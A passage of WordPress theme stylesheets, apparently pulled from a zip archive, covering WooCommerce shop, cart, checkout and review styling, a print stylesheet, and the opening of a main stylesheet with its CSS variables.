var(--flex-gray-15); } .woocommerce-mini-cart__buttons { display: flex; flex-flow: column nowrap; margin-top: 20px; text-align: center; } .woocommerce-mini-cart__buttons .button { text-transform: uppercase; } .woocommerce-mini-cart__buttons .button:not(.checkout) { margin-bottom: 10px; color: inherit; border: 1px solid var(--flex-gray-15); background-color: transparent; } .woocommerce-mini-cart__buttons .button:not(.checkout):hover { border-color: currentColor; -webkit-box-shadow: none; box-shadow: none; } .woocommerce .button { line-height: 22px; padding: 10px 25px; white-space: normal; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--wc-add-cart-bg, #6ab662); } .woocommerce .button:hover { -webkit-box-shadow: 0 4px 15px var(--wc-add-cart-bg-90, #6ab662e6); box-shadow: 0 4px 15px var(--wc-add-cart-bg-90, #6ab662e6); } /** product */ .product { position: relative; margin-bottom: 30px; } .product-thumb { position: relative; overflow: hidden; border-radius: var(--round-3); } .product-loop-content > * { margin-top: 12px; } .product-loop-content { position: relative; display: block; padding-top: 3px; } .woocommerce-loop-product__title, .product_title { font-family: var(--product-family, inherit); font-size: var(--product-fsize, var(--rem-small)); font-weight: var(--product-fweight, inherit); font-style: var(--product-fstyle, inherit); line-height: 1.5; letter-spacing: var(--product-fspace, inherit); text-transform: var(--product-transform, inherit); } h1.product_title { font-size: var(--h2-fsize); line-height: 1.2; } .price, .total .woocommerce-Price-amount, .quantity, td.product-price, td.product-subtotal, td[data-title='Subtotal'], td[data-title='Total'], td.product-total, td.cart-subtotal, .cart-subtotal td, .woocommerce-MyAccount-content .shop_table .woocommerce-Price-amount, .product_list_widget .woocommerce-Price-amount, .woocommerce-grouped-product-list-item .woocommerce-Price-amount, .price_label .from, .price_label .to { font-family: var(--price-family, var(--h3-family)); font-size: var(--price-fsize, var(--h3-fsize)); font-weight: var(--price-fweight, var(--h3-fweight)); font-style: var(--price-fstyle, var(--h3-fstyle)); letter-spacing: var(--price-fspace, var(--h3-fspace)); text-transform: var(--price-transform, var(--h3-transform)); } .price ins, .product_list_widget ins { text-decoration: none; } .woocommerce-grouped-product-list-item td { vertical-align: middle; } .price > *:not(del), .total .woocommerce-Price-amount, [data-title='Total'], .order-total td { color: var(--wc-price-color, inherit); } .price del { font-size: var(--em-mini); display: block; opacity: .7; } .woocommerce-Price-currencySymbol { font-size: var(--em-mini); vertical-align: top; } .product .price { line-height: 1; display: flex; align-items: flex-end; flex-flow: row wrap; } .single-product .entry-summary .price { font-size: 2.5rem; } .product .price > *:not(:first-child) { padding-right: 3px; } .product .price > *:not(:last-child) { padding-left: 3px; } .woocommerce-grouped-product-list-item__label { font-size: var(--rem-small); } .woocommerce .star-rating { font-family: 'ruby-icon' !important; font-size: 1rem; line-height: 1; position: relative; display: inline-flex; overflow: hidden; width: 5em; height: 1em; color: var(--wc-star-color, #ffc56d); } .woocommerce .star-rating span { position: absolute; top: 0; right: 0; float: right; overflow: hidden; padding-top: 1.5em; } .woocommerce .star-rating span:before { font-size: 1em; position: absolute; top: 0; right: 0; content: '\e951\e951\e951\e951\e951'; } .product-loop-content .button { line-height: 1.2; display: inline-flex; align-items: center; } .woocommerce .star-rating:before { font-size: 1em; position: absolute; top: 0; right: 0; content: '\e94f\e94f\e94f\e94f\e94f'; } .product-top { display: flex; align-items: center; flex: 0 0 100%; width: 100%; } .product-top .star-rating { margin-right: auto; } .product-entry-categories, .product_list_widget del { color: var(--meta-fcolor); } .product-entry-categories > *:not(:last-child) { margin-left: 7px; } .product-entry-categories a, .woocommerce-breadcrumb a, .product_meta a { transition: var(--effect); --webkit-transition: var(--effect); } .product-entry-categories a:hover { color: var(--g-color); } .onsale { font-size: var(--rem-mini); font-weight: bold; font-style: normal; position: absolute; z-index: 10; top: 10px; right: 10px; display: flex; align-items: center; justify-content: center; padding: 7px 12px; white-space: nowrap; color: var(--absolute-white); border-radius: var(--round-5); background: var(--wc-sale-bg, var(--dark-accent)); } .added_to_cart { display: none; } .woocommerce #respond input#submit.loading, .woocommerce .button.loading { opacity: .25 !important; } .button.loading:after { font-family: 'ruby-icon' !important; font-weight: 400; line-height: 1; margin-right: 5px; content: '\e942'; -webkit-animation: spin 2s linear infinite; animation: spin 2s linear infinite; } .button.added:after { font-family: 'ruby-icon' !important; font-weight: 400; line-height: 1; margin-right: 5px; content: '\e960'; } /** shop page */ .woocommerce .woocommerce-ordering, .woocommerce-page .woocommerce-ordering { margin-bottom: 20px; } .woocommerce-pagination .pagination-wrap { margin-top: 0; } .woocommerce .woocommerce-result-count, .woocommerce-page .woocommerce-result-count { padding-top: 15px; } .woocommerce-shop .woocommerce-breadcrumb, .woocommerce-shop .woocommerce-products-header { display: none; } /** wc page header */ .woocommerce-page .page-header { padding-bottom: 10px; text-align: center; background-color: var(--flex-gray-7); } .woocommerce-breadcrumb { margin-bottom: 7px; color: var(--meta-fcolor); } .woocommerce-breadcrumb a { color: var(--body-fcolor); } .woocommerce-breadcrumb a:hover { color: var(--g-color) } .woocommerce.archive .woocommerce-breadcrumb { padding-left: 20px; padding-right: 20px; } table.shop_table { margin-bottom: 0; border-left: 1px solid var(--flex-gray-15); } table.shop_table th, table.shop_table td { padding: 12px; vertical-align: middle; border-left: none; } table.shop_table td.product-quantity input { padding: 7px; } td.product-thumbnail, td.product-quantity { max-width: 80px; } td.product-subtotal { min-width: 100px; } table.cart td:not(.product-name) { text-align: center; } td.product-price, td.product-subtotal, td[data-title='Subtotal'], td.cart-subtotal, .woocommerce-MyAccount-content .shop_table .woocommerce-Price-amount, .price_label .from, .price_label .to { font-size: var(--rem-small); } table.cart .button { background-color: var(--dark-accent); } table.cart .button:hover { -webkit-box-shadow: 0 4px 15px var(--dark-accent-90); box-shadow: 0 4px 15px var(--dark-accent-90); } .woocommerce .cart-collaterals .cart_totals, .woocommerce-page .cart-collaterals .cart_totals { float: none; width: 100%; } .cart-collaterals table.shop_table, .woocommerce-checkout-review-order-table { border: none !important; } .cart-collaterals table.shop_table td, .checkout-col th.product-total, .checkout-col td.product-total, .checkout-col .cart-subtotal td, .checkout-col .shipping td, .checkout-col .order-total td { text-align: left; } td.product-remove a.remove { position: relative; top: auto; height: auto; } input#coupon_code { min-width: 150px; } .woocommerce-page .cart-collaterals { padding: 30px 20px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } .cart-collaterals h2, #order_review_heading { font-size: var(--h3-fsize); margin-bottom: 30px; } .cart-collaterals td[data-title='Subtotal'], td.product-total, .cart-subtotal td { font-size: 1rem; } .order-total { font-size: 1.25rem; border-top: 2px solid currentColor; } .recurring-total.order-total { font-size: 1rem; } .wc-proceed-to-checkout a.checkout-button { font-size: 1rem; display: block; width: 100%; padding: 15px; text-align: center; text-transform: uppercase; } .cross-sells > h2, .up-sells > h2, .related.products > h2 { font-size: var(--h3-fsize); display: block; margin-bottom: 20px; } .cross-sells, .up-sells, .related.products { display: block; padding-top: 20px; } .woocommerce-customer-details { margin-top: 30px; } p.cart-empty { margin-bottom: 20px; text-align: center; color: var(--meta-fcolor) } p.return-to-shop { display: block; text-align: center; } /** checkout page */ .checkout-col.col-right { padding: 30px 20px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } .checkout-col.col-left .col2-set > * { width: 100%; margin-bottom: 20px; } .checkout-col.col-left .col2-set > *:last-child { margin-bottom: 0; } .checkout-col h3 span { font-size: inherit; } #ship-to-different-address { margin-bottom: 10px; } .checkout-col label, .woocommerce-form label { font-size: var(--rem-mini); margin-bottom: 5px; } .woocommerce-checkout-review-order-table .cart_item td { padding: 7px 15px; } .woocommerce-checkout-review-order-table .cart_item:not(:first-of-type) td { border: none; } .woocommerce-checkout-payment, .woocommerce-privacy-policy-text { padding-top: 15px; border-top: 1px solid var(--flex-gray-15); } ul.payment_methods .payment_box p { font-size: var(--rem-mini); line-height: 1.7; color: var(--meta-fcolor); } ul.payment_methods label { font-size: var(--rem-small); font-weight: 700; } .woocommerce-checkout-payment .payment_methods li { margin-bottom: 10px; } .woocommerce-privacy-policy-text * { font-size: var(--rem-mini); line-height: 1.7; } .woocommerce-checkout-payment #place_order { font-size: 1rem; float: none; width: 100%; margin-top: 15px; text-align: center; text-transform: uppercase; } .woocommerce-shipping-methods li { display: flex; align-items: center; flex-flow: row-reverse nowrap; white-space: nowrap; } .woocommerce-shipping-methods label { font-size: var(--meta-fsize); } .woocommerce-form-coupon-toggle, .woocommerce-notices-wrapper .woocommerce-info, .woocommerce-message { font-size: var(--rem-mini); position: relative; margin-bottom: 20px; padding: 12px 20px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .woocommerce-message { display: flex; align-items: center; } .woocommerce-message a { margin-left: 10px; } .woocommerce-form-coupon { overflow: hidden; padding-bottom: 15px; } .showcoupon { transition: var(--effect); text-decoration: underline dotted; --webkit-transition: var(--effect); } .showcoupon:hover { color: var(--g-color); } .woocommerce-form-coupon p { font-size: var(--rem-mini); margin-bottom: 5px; } .woocommerce form .form-row-first, .woocommerce form .form-row-last, .woocommerce-page form .form-row-first, .woocommerce-page form .form-row-last { width: 100%; } /** order received page */ .woocommerce-order-received .page-header { display: none; } .woocommerce-thankyou-order-received { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); width: 100%; margin-top: 40px; margin-bottom: 20px; padding: 30px; text-align: center; letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); color: #8bc34a; border: 2px dashed currentColor; border-radius: var(--round-5); } ul.woocommerce-thankyou-order-details { font-size: var(--rem-small); display: flex; flex-direction: row; justify-content: space-between; box-sizing: border-box; margin-bottom: 40px; padding: 20px 30px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } ul.woocommerce-thankyou-order-details li { display: flex; flex-flow: column nowrap; } h2.woocommerce-order-details__title, h2.woocommerce-column__title { font-size: var(--h3-fsize); margin-bottom: 20px; } .woocommerce-table--order-details tfoot th { font-weight: bold; } .woocommerce-cart-form thead th:not(.product-name) { text-align: center; } /** category page */ .woocommerce-products-header { margin-bottom: 10px; padding-left: 20px; padding-right: 20px; } /** single product */ .woocommerce div.quantity { display: inline-block; line-height: 40px; position: relative; width: 80px; height: 40px; padding-left: 30px; padding-right: 30px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .woocommerce input[type='number']::-webkit-inner-spin-button, .woocommerce input[type='number']::-webkit-outer-spin-button { margin: 0; -webkit-appearance: none; } .woocommerce div.quantity .qty { font-family: inherit; font-weight: inherit; line-height: 34px; position: absolute; top: 0; left: 30px; bottom: 0; right: 30px; width: 20px; margin: auto; padding: 5px 0; text-align: center; border: none; background: transparent; } .woocommerce form.cart div.quantity { width: 100px; } .woocommerce form.cart div.quantity .qty { width: 40px; } .quantity-btn { line-height: 1; position: absolute; z-index: 10; top: 0; left: auto; bottom: 0; right: 0; display: block; width: 30px; height: 42px; cursor: pointer; transition: var(--effect); text-align: center; opacity: .7; --webkit-transition: var(--effect); } .quantity-btn:hover { opacity: 1; } .quantity-btn.up { left: 0; right: auto; } .quantity-btn:before { position: absolute; top: 50%; left: auto; bottom: auto; right: 10px; display: block; width: 10px; content: ''; border-top: 1px solid #555; } .quantity-btn.up:after { position: absolute; top: 50%; left: auto; bottom: auto; right: 10px; display: block; width: 10px; content: ''; -moz-transform: rotate(-90deg); -ms-transform: rotate(-90deg); -o-transform: rotate(-90deg); -webkit-transform: rotate(-90deg); transform: rotate(-90deg); border-top: 1px solid #555; } .quantity-btn:hover:before, .quantity-btn:hover:after { border-color: #000; } /** my account */ .woocommerce-MyAccount-content p { margin-bottom: 1.5em; } .woocommerce-MyAccount-content a, .woocommerce-form a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline solid transparent; color: var(--g-color); } .woocommerce-MyAccount-content a:not(.button):hover, .woocommerce-form a:hover { text-decoration-color: var(--g-color); } .woocommerce-MyAccount-navigation li { margin-bottom: 15px !important; } .woocommerce-MyAccount-navigation ul { margin-left: 40px; padding: 30px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .woocommerce-MyAccount-navigation a { -webkit-transition: var(--effect); transition: var(--effect); } .product_meta { font-size: var(--meta-fsize); display: flex; flex-flow: column nowrap; } .product_meta .sku, .product_meta a { color: var(--body-fcolor); } .woocommerce-MyAccount-navigation a:hover, .product_meta a:hover { color: var(--g-color); } .woocommerce-MyAccount-content [data-title='Total'] { font-size: inherit; color: inherit; } .woocommerce-MyAccount-content [data-title='Date'], .woocommerce-MyAccount-content [data-title='Status'], .woocommerce-LostPassword, .cart-collaterals table, .checkout-col.col-left span, .woocommerce-tabs table, .woocommerce-Reviews .star-rating, strong.woocommerce-review__author { font-size: var(--rem-mini); } .woocommerce-EditAccountForm label, .product_list_widget .product-title, .product_list_widget .woocommerce-Price-amount { font-size: var(--rem-small); } .woocommerce-account h2, .woocommerce-account h3 { font-size: 1rem; margin-bottom: 15px; padding-bottom: 15px; text-transform: uppercase; border-bottom: 2px solid var(--flex-gray-15); } .woocommerce form .show-password-input, .woocommerce-page form .show-password-input { display: none; } /** single product */ .wc-tabs { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); display: flex; flex-flow: row nowrap; margin-bottom: 15px; padding-bottom: 15px; letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); border-bottom: 1px solid var(--flex-gray-15); } .wc-tabs li { margin-left: 15px; opacity: .5; } .wc-tabs li.active, .wc-tabs li:hover { opacity: 1; } p.stars span { display: flex; flex-flow: row wrap; } p.stars a { font-family: 'ruby-icon' !important; font-size: 0; line-height: 1; position: relative; display: inline-block; margin-left: 5px; padding-left: 5px; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; border-left: 1px solid var(--flex-gray-15); } p.stars a:hover, p.stars a.active { color: var(--wc-star-color, #ffc56d) !important; } p.stars a:before { font-size: var(--rem-small); position: relative; content: '\e94f'; text-indent: 0; } p.stars a:hover:before { content: '\e951'; } p.stars a.star-2:before { content: '\e94f\e94f'; } p.stars a.star-2.active:before, p.stars a.star-2:hover:before { content: '\e951\e951'; } p.stars a.star-3:before { content: '\e94f\e94f\e94f'; } p.stars a.star-3.active:before, p.stars a.star-3:hover:before { content: '\e951\e951\e951'; } p.stars .star-4:before { content: '\e94f\e94f\e94f\e94f'; } p.stars a.star-4.active:before, p.stars a.star-4:hover:before { content: '\e951\e951\e951\e951'; } p.stars a.star-5:before { content: '\e94f\e94f\e94f\e94f\e94f'; } p.stars a.star-5.active:before, p.stars a.star-5:hover:before { content: '\e951\e951\e951\e951\e951'; } .woocommerce-Reviews { font-size: var(--rem-small); } .woocommerce-Reviews ol.commentlist { margin-bottom: 20px; padding: 0; list-style: none; } .woocommerce-Reviews .comment_container { display: inline-flex; margin-top: 15px; margin-bottom: 15px; } .woocommerce-Reviews .avatar { width: 60px; height: 60px; margin-top: 0; margin-left: 15px; border-radius: 50%; } .woocommerce-Reviews .comment-text { width: 90%; } time.woocommerce-review__published-date { font-size: var(--rem-mini); text-decoration: none; color: var(--meta-fcolor); } .woocommerce-Reviews label { display: inline-block; margin-bottom: 7px; } h2.woocommerce-Reviews-title { font-size: 1.2rem; margin-bottom: 5px; } .woocommerce-Reviews span#reply-title { font-size: 1rem; display: block; margin-bottom: 30px; padding-bottom: 15px; border-bottom: 1px solid var(--flex-gray-15); } .woocommerce-noreviews { width: auto; margin-top: 20px; margin-bottom: 20px; padding: 10px; border-radius: var(--round-5); background: var(--flex-gray-7); } /** single product image */ .single-product .wc-wrap { padding-left: 20px; padding-right: 20px; } .single_variation_wrap > *:not(:last-child) { margin-bottom: 15px; } .woocommerce .flex-control-thumbs { display: flex; flex-flow: row nowrap; margin-top: 5px; } .woocommerce .flex-control-thumbs li { position: relative; display: block; overflow: hidden; width: 18%; height: 0; margin-left: 5px; padding-bottom: 18%; cursor: pointer; border: 1px solid var(--flex-gray-15); } .woocommerce .flex-control-thumbs img { position: absolute; display: block; width: 100%; height: 100%; padding: 5px; object-fit: cover; } .woocommerce-tabs { padding-top: 40px; } .product_meta > *:not(:last-child) { margin-bottom: 10px; } .single-product .cart { display: flex; flex-flow: row nowrap; } .single-product .cart.grouped_form, .single-product .cart.variations_form { flex-flow: column nowrap; } .single-product .cart .button { font-size: 1rem; margin-right: 15px; white-space: nowrap; } .single-product .variations_form .button { margin-top: 15px; margin-right: 0; } .single-product .variations_form select { width: 100%; } .single-product .entry-summary > *:not(:last-child) { margin-bottom: 25px; } .reset_variations { font-size: var(--rem-small); float: left; padding-top: 4px; color: #ff6d6d; } .woocommerce-product-rating { display: flex; align-items: center; flex-flow: row wrap; } .widget_price_filter .ui-widget-content { border: 0; border-radius: var(--round-5); background: var(--flex-gray-15); } .widget_price_filter .ui-slider-horizontal { height: 2px;; } .widget_price_filter .ui-slider { position: relative; text-align: right; } .widget_price_filter .price_slider { margin-bottom: 20px; } .widget_price_filter .ui-slider-horizontal .ui-slider-range { top: 0; height: 100%; } .widget_price_filter .ui-slider .ui-slider-range { font-size: .7em; position: absolute; z-index: 1; display: block; border-radius: var(--round-5); background-color: var(--dark-accent); } .widget_price_filter .ui-slider .ui-slider-handle { position: absolute; z-index: 2; top: auto; box-sizing: border-box; width: 15px; height: 15px; margin-top: -6px; margin-right: auto; cursor: ew-resize; opacity: 1; border: 3px solid var(--dark-accent); border-radius: 100%; background-color: #fff; } .widget_price_filter .ui-slider .ui-slider-handle { position: absolute; z-index: 2; top: auto; box-sizing: border-box; width: 15px; height: 15px; margin-top: -6px; margin-right: auto; cursor: ew-resize; opacity: 1; border: 3px solid var(--dark-accent); border-radius: 100%; background-color: #fff; } .widget_price_filter .ui-slider .ui-slider-handle:last-child { margin-right: -5px; } .widget_price_filter .button { width: 100%; margin-top: 15px; } .price_slider_amount { display: flex; flex-flow: column-reverse nowrap; } @media (min-width: 1025px) { .shop-page:not(.without-sidebar) .grid-container > *:nth-child(1) { flex: 0 0 70%; width: 70%; } .woocommerce-shop .grid-container > *:nth-child(2) { flex: 0 0 30%; width: 30%; } .wc-wrap { padding-top: 50px; } .shop-page { margin-bottom: 50px; } .product-loop-content { padding-bottom: 15px; } .product-loop-content > .button { margin-top: 0; } .product-loop-content .button { position: absolute; z-index: 10; top: 100%; margin-top: 0; padding-top: 12px; opacity: 0; } .products .product:before { position: absolute; top: -15px; left: 0; right: 0; display: block; height: calc(100% + 15px); content: ''; -webkit-transition: var(--effect); transition: var(--effect); pointer-events: none; opacity: 0; border: 1px solid transparent; border-radius: var(--round-3); background-color: var(--solid-white); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); backface-visibility: hidden; } .products > .product:hover { z-index: 100; } .products > .product:hover .button { opacity: 1; } .products > .product:hover:before { height: calc(100% + 75px); opacity: 1; } [data-theme='dark'] .product:hover:before { background-color: var(--dark-accent); } /** cart page */ .woocommerce-page .woocommerce-cart-form, .woocommerce-page .cart-collaterals { display: block; float: right; } .woocommerce-page .woocommerce-cart-form { width: 66.7%; padding-left: 60px; } .woocommerce-page .cart-collaterals { width: 33%; padding-bottom: 50px; } .woocommerce-page .cross-sells { clear: both; width: 100%; } /** checkout */ .checkout-col { display: block; float: right; } .checkout-col.col-left { width: 65%; padding-left: 60px; } .checkout-col.col-right { width: 35%; padding-bottom: 50px; } .cross-sells, .up-sells, .related.products { padding-top: 30px; } .woocommerce-page .page-header { padding-bottom: 20px; } .woocommerce-tabs { padding-top: 50px; padding-bottom: 20px; } .woocommerce-products-header { margin-bottom: 10px; } .wc-tabs li { margin-left: 25px; } } @media (min-width: 768px) { .wc-col-2 > * { flex: 0 0 50%; max-width: 50%; } .wc-col-3 > * { flex: 0 0 33.333%; max-width: 33.333%; } .wc-col-4 > * { flex: 0 0 25%; max-width: 25%; } .wc-col-5 > * { flex: 0 0 20%; max-width: 20%; } .wc-col-6 > * { flex: 0 0 16.66%; max-width: 16.66%; } .wc-col-7 > * { flex: 0 0 14.28%; max-width: 14.28%; } ul.woocommerce-thankyou-order-details li { margin-bottom: 0 !important; } } @media (max-width: 1024px) and (min-width: 768px) { [class*='tablet-columns-'] .products { justify-content: center; } .tablet-columns-2 .products > * { flex: 0 0 50%; max-width: 50%; } .tablet-columns-3 .products > * { flex: 0 0 33.333%; max-width: 33.333%; } .tablet-columns-4 .products > * { flex: 0 0 25%; max-width: 25%; } .tablet-columns-5 .products > * { flex: 0 0 20%; max-width: 20%; } .tablet-columns-6 .products > * { flex: 0 0 16.66%; max-width: 16.66%; } .tablet-columns-7 .products > * { flex: 0 0 14.28%; max-width: 14.28%; } } @media (max-width: 767px) { ul.woocommerce-thankyou-order-details { flex-flow: column nowrap; } .woocommerce-column--2, .woocommerce-MyAccount-content, .woocommerce .col2-set .col-2, .woocommerce-page .col2-set .col-2 { margin-top: 40px; } .woocommerce-MyAccount-navigation ul { margin-left: 0; } .single-product .entry-summary { margin-top: 20px; } .single-product .entry-summary > *:not(:last-child) { margin-bottom: 20px; } .mobile-columns-2 .products > * { flex: 0 0 50%; max-width: 50%; } .mobile-columns-2 .products-outer.gutter-n15 { margin-left: -10px; margin-right: -10px; } .mobile-columns-2 .product.gutter-p15 { padding-left: 10px; padding-right: 10px; } .mobile-columns-2 .products .button { padding: 7px 15px; } .woocommerce-page table.cart td.product-thumbnail, .woocommerce-page table.cart td.product-quantity { max-width: 100%; } .woocommerce-page table.cart .product-thumbnail:before { display: none; } .woocommerce-page table.cart .product-thumbnail { display: block; } .woocommerce-page table.cart td.product-thumbnail img { display: block; margin-right: 0; width: 120px; max-width: 120px; } .woocommerce-page table.cart td.product-remove { position: absolute; z-index: 10; top: 0; left: 0; background-color: var(--flex-gray-15); } .checkout-col.col-right { margin-top: 30px; } .woocommerce-thankyou-order-received { padding: 20px; } }PK!!z++assets/css/print.cssnu[@media print { body[data-theme="dark"] { --h1-fcolor: #000000; --h2-fcolor: #000000; --h3-fcolor: #000000; --h4-fcolor: #000000; --h5-fcolor: #000000; --h6-fcolor: #000000; --meta-fcolor: #000000; --body-fcolor: #000000; --meta-b-fcolor: #000000; } .single-sidebar, .s-ct img, .header-wrap, .single-related, .footer-wrap, .single-popular, .efoot, .entry-bottom, .entry-newsletter, .featured-gallery-wrap, .breadcrumb-wrap, .s-cats, .l-shared-sec-outer, .entry-sec, .review-section, .s-ct .widget, .related-sec, .sqview, .t-shared-sec, .wp-block-image, .s-feat-holder img, .single-header-inner:before, .breadcrumb-absolute, .single-header-content:before, .featured-embed, .tipsy, .top-site-ad, #ruby-table-contents, .single-meta .meta-avatar, .smeta-extra { display: none !important; } .s-ct, .single-header-content { flex-basis: 100% !important; width: 100% !important; max-width: 100% !important; } body .site-outer { margin-top: 0 !important; } .single-header-content { padding: 0; } .single-header-content *, blockquote *, .smeta-sec * { color: #000000 !important; } }PK!2!assets/css/main.cssnu[/* ----------------- >>> TABLE OF CONTENTS: 1 - CSS Variables 2 - General 3 - Icon Fonts 4 - Swiper Slider 5 - Header 6 - Post Entry 7 - Post Modules 8 - Blocks 9 - Single 10 - Archives 11 - Pages 12 - Footer 13 - Responsive 14 - Print ----------------- */ /* ----------------- 1 - CSS Variables ----------------- */ :root { --body-fcolor: #282828; /** borders */ --round-5: 5px; --round-3: 3px; --round-7: 7px; /*--flex-*/ --flex-gray-7: #88888812; --flex-gray-15: #88888826; --flex-gray-20: #88888833; --flex-gray-40: #88888866; /** absolute color */ --absolute-white: #fff; --absolute-light: #ddd; --absolute-dark: #242424; --height-34: 34px; --height-40: 40px; --padding-40: 0 40px; --shadow-2: #00000005; --shadow-7: #00000012; --shadow-12: #0000001f; --rem-small: .92rem; --rem-mini: .8rem; --em-small: .92em; --em-mini: .8em; --timing: cubic-bezier(0.32, 0.74, 0.57, 1); --effect: all .25s cubic-bezier(0.32, 0.74, 0.57, 1); --el-spacing: 12px; --bottom-spacing: 35px; --box-spacing: 5%; --nav-height: 60px; --solid-white: #fff; --solid-light: #fafafa; --review-color: #ffc300; --video-color: #ffc300; --gallery-color: #729dff; --audio-color: #ffa052; --max-width-wo-sb: 100%; --g-color: #ff184e; --g-color-90: #ff184ee6; --dark-accent: #191c20; --dark-accent-90: #191c20f2; --dark-accent-0: #191c2000; /** header default */ --nav-bg: #fff; --nav-bg-from: #fff; --nav-bg-to: #fff; --nav-color: #282828; --nav-color-10: #28282820; --subnav-bg: #fff; --subnav-bg-from: #fff; --subnav-bg-to: #fff; --subnav-color: #282828; --subnav-color-10: #28282820; --transparent-nav-color: #fff; --swiper-navigation-size: 44px; --indicator-height: 4px; --indicator-bg-from: #ff0084; --indicator-bg-to: #2c2cf8; --privacy-color: #fff; --heading-color: var(--body-fcolor); --heading-sub-color: var(--g-color); --column-border-color: var(--flex-gray-20); --bottom-border-color: var(--flex-gray-20); /** fonts */ --body-family: 'Oxygen', sans-serif; --body-fsize: 16px; --body-fweight: 400; --body-fspace: normal; --body-transform: none; --body-fstyle: normal; --h1-family: 'Encode Sans Condensed', sans-serif; --h1-fsize: 40px; --h1-fweight: 700; --h1-fspace: normal; --h1-transform: none; --h1-fstyle: normal; --h1-fcolor: inherit; --h2-family: 'Encode Sans Condensed', sans-serif; --h2-fsize: 28px; --h2-fweight: 700; --h2-fspace: normal; --h2-transform: none; --h2-fstyle: normal; --h2-fcolor: inherit; --h3-family: 'Encode Sans Condensed', sans-serif; --h3-fsize: 22px; --h3-fweight: 700; --h3-fspace: normal; --h3-transform: none; --h3-fstyle: normal; --h3-fcolor: inherit; --h4-family: 'Encode Sans Condensed', sans-serif; --h4-fsize: 16px; --h4-fweight: 700; --h4-fspace: normal; --h4-transform: none; --h4-fstyle: normal; --h4-fcolor: inherit; --h5-family: 'Encode Sans Condensed', sans-serif; --h5-fsize: 14px; --h5-fweight: 700; --h5-fspace: normal; --h5-transform: none; --h5-fstyle: normal; --h5-fcolor: inherit; --h6-family: 'Encode Sans Condensed', sans-serif; --h6-fsize: 13px; --h6-fweight: 600; --h6-fspace: normal; --h6-transform: none; --h6-fstyle: normal; --h6-fcolor: inherit; --tagline-family: 'Encode Sans Condensed', sans-serif; --tagline-fsize: 28px; --tagline-fweight: 400; --tagline-fspace: normal; --tagline-transform: none; --tagline-fstyle: normal; --tagline-fcolor: inherit; --cat-family: 'Oxygen', sans-serif; --cat-fsize: 10px; --cat-fweight: 700; --cat-fspace: .07em; --cat-transform: uppercase; --cat-fstyle: normal; --meta-family: 'Encode Sans Condensed', sans-serif; --meta-fsize: 13px; --meta-fweight: 400; --meta-fspace: normal; --meta-transform: none; --meta-fstyle: normal; --meta-fcolor: #666; --meta-b-family: inherit; --meta-b-fweight: 600; --meta-b-fspace: normal; --meta-b-transform: none; --meta-b-fstyle: normal; --meta-b-fcolor: #282828; --input-family: 'Encode Sans Condensed', sans-serif; --input-fsize: 14px; --input-fweight: 400; --input-fspace: normal; --input-transform: none; --input-fstyle: normal; --input-fcolor: inherit; --btn-family: 'Encode Sans Condensed', sans-serif; --btn-fsize: 12px; --btn-fweight: 700; --btn-fspace: normal; --btn-transform: none; --btn-fstyle: normal; --btn-fcolor: inherit; --menu-family: 'Encode Sans Condensed', sans-serif; --menu-fsize: 17px; --menu-fweight: 600; --menu-fspace: -.02em; --menu-transform: none; --menu-fstyle: normal; --submenu-family: 'Encode Sans Condensed', sans-serif; --submenu-fsize: 13px; --submenu-fweight: 500; --submenu-fspace: -.02em; --submenu-transform: none; --submenu-fstyle: normal; --dwidgets-family: 'Oxygen', sans-serif; --dwidgets-fsize: 13px; --dwidgets-fweight: 600; --dwidgets-fspace: 0; --dwidgets-fstyle: normal; --dwidgets-transform: none; --excerpt-color: #666; --headline-fsize: 45px; --tagline-s-fsize: 22px; --excerpt-fsize: 14px; } [data-theme='dark'], .light-scheme { --flex-gray-7: #88888818; --flex-gray-15: #88888840; --flex-gray-20: #8888884d; /** darker on dark */ --shadow-2: #00000033; --shadow-7: #0000004d; --shadow-12: #00000066; /** color */ --body-fcolor: #fff; --h1-fcolor: #fff; --h2-fcolor: #fff; --h3-fcolor: #fff; --h4-fcolor: #fff; --h5-fcolor: #fff; --h6-fcolor: #fff; --headline-fcolor: #fff; --tagline-fcolor: #fff; --input-fcolor: #fff; --bcrumb-color: #fff; --excerpt-color: #ddd; --meta-fcolor: #bbb; --meta-b-fcolor: #fff; --solid-white: #191c20; --solid-light: #333; /** header default */ --nav-bg: #131518; --nav-bg-from: #131518; --nav-bg-to: #131518; --nav-color: #fff; --nav-color-10: #ffffff15; --subnav-bg: #191c20; --subnav-bg-from: #191c20; --subnav-bg-to: #191c20; --subnav-color: #fff; --subnav-color-10: #ffffff15; --heading-color: var(--body-fcolor); --heading-sub-color: var(--g-color); --dark-accent: #0e0f12; --dark-accent-90: #0e0f12f2; --dark-accent-0: #0e0f1200; } body:not([data-theme='dark']) [data-mode='dark'], body[data-theme='dark'] [data-mode='default'], body .light-scheme [data-mode='default'] { display: none !important; } body .light-scheme [data-mode='dark'] { display: inherit !important; } [data-theme='dark'] .icon-svg, .light-scheme .icon-svg { filter: invert(100%); -webkit-filter: invert(100%); } .dark-opacity[data-theme='dark'] .p-featured { background-color: #000; } .dark-opacity[data-theme='dark'] .wp-post-image { opacity: .7; } [data-theme='dark'] input::placeholder, .light-scheme input::placeholder { color: var(--absolute-light); } .global-color { color: var(--g-color); } /* ----------------- 2 - General ----------------- */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, blockquote, p, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, ins, kbd, q, s, samp, small, strike, 